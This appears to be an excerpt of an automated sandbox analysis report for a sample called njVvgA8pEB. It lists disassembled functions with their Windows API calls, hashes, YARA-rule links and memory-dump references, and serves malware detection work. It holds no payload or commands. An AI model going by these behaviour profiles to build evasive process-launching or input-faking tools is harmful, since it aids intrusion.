                                                                          • Opcode ID: 5da777c71d0dc6c440ace1c30eaf7df3c7b3a07e0f29c7743f5349ec65431ec9
                                                                          • Instruction ID: 75248dbd220df2302c8ab4748b9fd21f7b6f062d742bf64507a1a1b31b5c5df4
                                                                          • Opcode Fuzzy Hash: 5da777c71d0dc6c440ace1c30eaf7df3c7b3a07e0f29c7743f5349ec65431ec9
                                                                          • Instruction Fuzzy Hash: 1611B2B2110219BFEF168F64CC85EE7BF6DEF08798F114115BA44A60A0CA729C21DBA4
                                                                          Function 00339AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __init_pointers.LIBCMT ref: 00339AE6
                                                                            • Part of subcall function 00333187: EncodePointer.KERNEL32(00000000), ref: 0033318A
                                                                            • Part of subcall function 00333187: __initp_misc_winsig.LIBCMT ref: 003331A5
                                                                            • Part of subcall function 00333187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00339EA0
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00339EB4
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00339EC7
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00339EDA
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00339EED
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00339F00
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00339F13
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00339F26
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00339F39
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00339F4C
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00339F5F
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00339F72
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00339F85
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00339F98
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00339FAB
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00339FBE
                                                                          • __mtinitlocks.LIBCMT ref: 00339AEB
                                                                          • __mtterm.LIBCMT ref: 00339AF4
                                                                            • Part of subcall function 00339B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00339AF9,00337CD0,003CA0B8,00000014), ref: 00339C56
                                                                            • Part of subcall function 00339B5C: _free.LIBCMT ref: 00339C5D
                                                                            • Part of subcall function 00339B5C: DeleteCriticalSection.KERNEL32(02=,?,?,00339AF9,00337CD0,003CA0B8,00000014), ref: 00339C7F
                                                                          • __calloc_crt.LIBCMT ref: 00339B19
                                                                          • __initptd.LIBCMT ref: 00339B3B
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00339B42
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                          • String ID:
                                                                          • API String ID: 3567560977-0
                                                                          • Opcode ID: a73953be600c03795f59c264d44283b69f61bb89b7896969a5ad478dc69ae719
                                                                          • Instruction ID: 1e2c8dd14639309041a8223a30a84b927f5919ba1f1f4a1f48219fefee272b34
                                                                          • Opcode Fuzzy Hash: a73953be600c03795f59c264d44283b69f61bb89b7896969a5ad478dc69ae719
                                                                          • Instruction Fuzzy Hash: 44F06D32609721DAE6277774BC83B8A76949F02734F214A1BF460CD0E2EFA0944142A0
                                                                          Function 0039B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0039B644
                                                                          • _memset.LIBCMT ref: 0039B653
                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003D6F20,003D6F64), ref: 0039B682
                                                                          • CloseHandle.KERNEL32 ref: 0039B694
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$CloseCreateHandleProcess
                                                                          • String ID: o=$do=
                                                                          • API String ID: 3277943733-675366838
                                                                          • Opcode ID: 35f9f5ad3b98938562aa74ccce71afc5c96a8cc0f9dd1c4ba1f1ddb38b4a7b99
                                                                          • Instruction ID: c07a42acf0bddf7a0af25ca1a70ca71bbd30476f34e7d624558029e85e123fdf
                                                                          • Opcode Fuzzy Hash: 35f9f5ad3b98938562aa74ccce71afc5c96a8cc0f9dd1c4ba1f1ddb38b4a7b99
                                                                          • Instruction Fuzzy Hash: F0F05EB66417047FE3122771BC47FBB7B9CEB08395F004022FA19E91A2D7765C0087A8
                                                                          Function 0033406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00333F85), ref: 00334085
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0033408C
                                                                          • EncodePointer.KERNEL32(00000000), ref: 00334097
                                                                          • DecodePointer.KERNEL32(00333F85), ref: 003340B2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                          • String ID: RoUninitialize$combase.dll
                                                                          • API String ID: 3489934621-2819208100
                                                                          • Opcode ID: bacd67001e7b97d3f025d321868291590d9b333f6e220b60e007814c5b872ea4
                                                                          • Instruction ID: 5c64e6f247fedcc6e53886cab0dd74db0e9fa94c9b2a7746e662558151f1ca8e
                                                                          • Opcode Fuzzy Hash: bacd67001e7b97d3f025d321868291590d9b333f6e220b60e007814c5b872ea4
                                                                          • Instruction Fuzzy Hash: 6EE09274682202AFEB13AF65EC49B467BACB704742F104426F111F10A0CBB79A048B16
                                                                          Function 003764B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 3253778849-0
                                                                          • Opcode ID: c9e1620ce3bba5a047f8eccdd8e9848ec028c7919196af9f49fd1319a3b40909
                                                                          • Instruction ID: 473c8cb615a51cfc159563b96bb9544d8035a733fc63bfc300dc52e4658a11a0
                                                                          • Opcode Fuzzy Hash: c9e1620ce3bba5a047f8eccdd8e9848ec028c7919196af9f49fd1319a3b40909
                                                                          • Instruction Fuzzy Hash: D6618D30500A5A9BCF1BEF64CCA2EFE37A9AF09308F448519F8595F192DB38E945CB50
                                                                          Function 003901E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                            • Part of subcall function 00390E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0038FDAD,?,?), ref: 00390E31
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003902BD
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003902FD
                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00390320
                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00390349
                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0039038C
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00390399
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                          • String ID:
                                                                          • API String ID: 4046560759-0
                                                                          • Opcode ID: b96e7b9b750119d3c850326715a24943475c1bbeb3ea0ea8da2c1308ec007d18
                                                                          • Instruction ID: 0468b132636d46406677ceb91599d2acb07261d5b50d281536081c8ea0f27e6a
                                                                          • Opcode Fuzzy Hash: b96e7b9b750119d3c850326715a24943475c1bbeb3ea0ea8da2c1308ec007d18
                                                                          • Instruction Fuzzy Hash: EC513E312082049FCB1AEF64C895EAFBBE9FF89314F04491DF5958B2A1DB31D945CB52
                                                                          Function 00395799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetMenu.USER32(?), ref: 003957FB
                                                                          • GetMenuItemCount.USER32(00000000), ref: 00395832
                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0039585A
                                                                          • GetMenuItemID.USER32(?,?), ref: 003958C9
                                                                          • GetSubMenu.USER32(?,?), ref: 003958D7
                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00395928
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$CountMessagePostString
                                                                          • String ID:
                                                                          • API String ID: 650687236-0
                                                                          • Opcode ID: 0736627f830108cc92d9c0fa5b579a76d304c2fdd3342f7f1385b7c6052c4370
                                                                          • Instruction ID: 68ded3020d2aaef70157386c3500554cd473997694cab387b99dddbe38c94122
                                                                          • Opcode Fuzzy Hash: 0736627f830108cc92d9c0fa5b579a76d304c2fdd3342f7f1385b7c6052c4370
                                                                          • Instruction Fuzzy Hash: 71513C31E00615AFCF17EF64C855AAEBBB8EF48310F114465E816AB351CB75AE818B90
                                                                          Function 0036EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 0036EF06
                                                                          • VariantClear.OLEAUT32(00000013), ref: 0036EF78
                                                                          • VariantClear.OLEAUT32(00000000), ref: 0036EFD3
                                                                          • _memmove.LIBCMT ref: 0036EFFD
                                                                          • VariantClear.OLEAUT32(?), ref: 0036F04A
                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0036F078
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                                          • String ID:
                                                                          • API String ID: 1101466143-0
                                                                          • Opcode ID: 4edf5218fadf4ba35479c232d9664aab48fea6d46bc5c3c30b81ec7331a92388
                                                                          • Instruction ID: 72be0a9217e6c10f6b6ef3dbe5f87790c47c066dd74e6e49b36e8f55e4f1acfd
                                                                          • Opcode Fuzzy Hash: 4edf5218fadf4ba35479c232d9664aab48fea6d46bc5c3c30b81ec7331a92388
                                                                          • Instruction Fuzzy Hash: EC5166B5A00209EFCB15CF58D880AAAB7B8FF4C314F15856AE959DB305E735E911CBA0
                                                                          Function 0037220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00372258
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003722A3
                                                                          • IsMenu.USER32(00000000), ref: 003722C3
                                                                          • CreatePopupMenu.USER32 ref: 003722F7
                                                                          • GetMenuItemCount.USER32(000000FF), ref: 00372355
                                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00372386
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                          • String ID:
                                                                          • API String ID: 3311875123-0
                                                                          • Opcode ID: 04b9ff8d2fa97333a3dbf2af273b6a748224320b1632d0896ab618232077c167
                                                                          • Instruction ID: dffafb638626de1ca9d242198a7625e5efe343321b507164c22ca39d9883f3b2
                                                                          • Opcode Fuzzy Hash: 04b9ff8d2fa97333a3dbf2af273b6a748224320b1632d0896ab618232077c167
                                                                          • Instruction Fuzzy Hash: 7751C134600249DFEF32CF64C888BAFBBF9BF05314F158229E8599B291D3798904CB51
                                                                          Function 00311765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
                                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 0031179A
                                                                          • GetWindowRect.USER32(?,?), ref: 003117FE
                                                                          • ScreenToClient.USER32(?,?), ref: 0031181B
                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0031182C
                                                                          • EndPaint.USER32(?,?), ref: 00311876
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                          • String ID:
                                                                          • API String ID: 1827037458-0
                                                                          • Opcode ID: 27d825bbfe0e434fba0e7a2c103aa53801f88c9d84366344e5994e29f11f5050
                                                                          • Instruction ID: 1ebe461b1adb10c4b1cf570dcd4f82ca5db4ba9bc1379854104b3a117180136f
                                                                          • Opcode Fuzzy Hash: 27d825bbfe0e434fba0e7a2c103aa53801f88c9d84366344e5994e29f11f5050
                                                                          • Instruction Fuzzy Hash: A541A0711057009FD712DF24DC84FEA7BECEB49724F144629F6A4CA2A1C7319885DB61
                                                                          Function 0039B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShowWindow.USER32(003D57B0,00000000,01146948,?,?,003D57B0,?,0039B5A8,?,?), ref: 0039B712
                                                                          • EnableWindow.USER32(00000000,00000000), ref: 0039B736
                                                                          • ShowWindow.USER32(003D57B0,00000000,01146948,?,?,003D57B0,?,0039B5A8,?,?), ref: 0039B796
                                                                          • ShowWindow.USER32(00000000,00000004,?,0039B5A8,?,?), ref: 0039B7A8
                                                                          • EnableWindow.USER32(00000000,00000001), ref: 0039B7CC
                                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0039B7EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 642888154-0
                                                                          • Opcode ID: f63c07b09f488f837a6dc471e236248e2e10309edf80907f71f690dd723a36a3
                                                                          • Instruction ID: 9f8d7b7d8d5feae54f53370cc49182a0f1c8f6bfd6c9c8d1e8218f0894addba7
                                                                          • Opcode Fuzzy Hash: f63c07b09f488f837a6dc471e236248e2e10309edf80907f71f690dd723a36a3
                                                                          • Instruction Fuzzy Hash: 5A419535600240AFDF23CFA4E599B95BBE1FF85350F1942B9F9488F6A2C731A856CB50
                                                                          Function 0038709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00384E41,?,?,00000000,00000001), ref: 003870AC
                                                                            • Part of subcall function 003839A0: GetWindowRect.USER32(?,?), ref: 003839B3
                                                                          • GetDesktopWindow.USER32 ref: 003870D6
                                                                          • GetWindowRect.USER32(00000000), ref: 003870DD
                                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0038710F
                                                                            • Part of subcall function 00375244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003752BC
                                                                          • GetCursorPos.USER32(?), ref: 0038713B
                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00387199
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                          • String ID:
                                                                          • API String ID: 4137160315-0
                                                                          • Opcode ID: 14042de2804bc451f325b91cd73b0772aa0712c08962180849fa6b9e4d4e75bc
                                                                          • Instruction ID: 6119fbb3842343eca6aea27434a12ab1085a889f7a298921312812e4556f0dec
                                                                          • Opcode Fuzzy Hash: 14042de2804bc451f325b91cd73b0772aa0712c08962180849fa6b9e4d4e75bc
                                                                          • Instruction Fuzzy Hash: C631F232509305AFC721EF14C849B9BB7AAFF88304F10091AF488D7191C775EA08CB92
                                                                          Function 00368879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 003680A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003680C0
                                                                            • Part of subcall function 003680A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003680CA
                                                                            • Part of subcall function 003680A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003680D9
                                                                            • Part of subcall function 003680A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003680E0
                                                                            • Part of subcall function 003680A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003680F6
                                                                          • GetLengthSid.ADVAPI32(?,00000000,0036842F), ref: 003688CA
                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003688D6
                                                                          • HeapAlloc.KERNEL32(00000000), ref: 003688DD
                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 003688F6
                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,0036842F), ref: 0036890A
                                                                          • HeapFree.KERNEL32(00000000), ref: 00368911
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                          • String ID:
                                                                          • API String ID: 3008561057-0
                                                                          • Opcode ID: f1c6610c07b7d57110ed181e09e21394d78a32b30e4cc0868d8b352e8e9f273c
                                                                          • Instruction ID: d27da9394660f9f837c48762fe64e01754b57ea9aa290fac962af07232344ea6
                                                                          • Opcode Fuzzy Hash: f1c6610c07b7d57110ed181e09e21394d78a32b30e4cc0868d8b352e8e9f273c
                                                                          • Instruction Fuzzy Hash: 6811B171501209FFDB129FA4DC09BBE7BACEB49311F10822DE885D7214CB329D14DB60
                                                                          Function 003685B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003685E2
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 003685E9
                                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003685F8
                                                                          • CloseHandle.KERNEL32(00000004), ref: 00368603
                                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00368632
                                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00368646
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                          • String ID:
                                                                          • API String ID: 1413079979-0
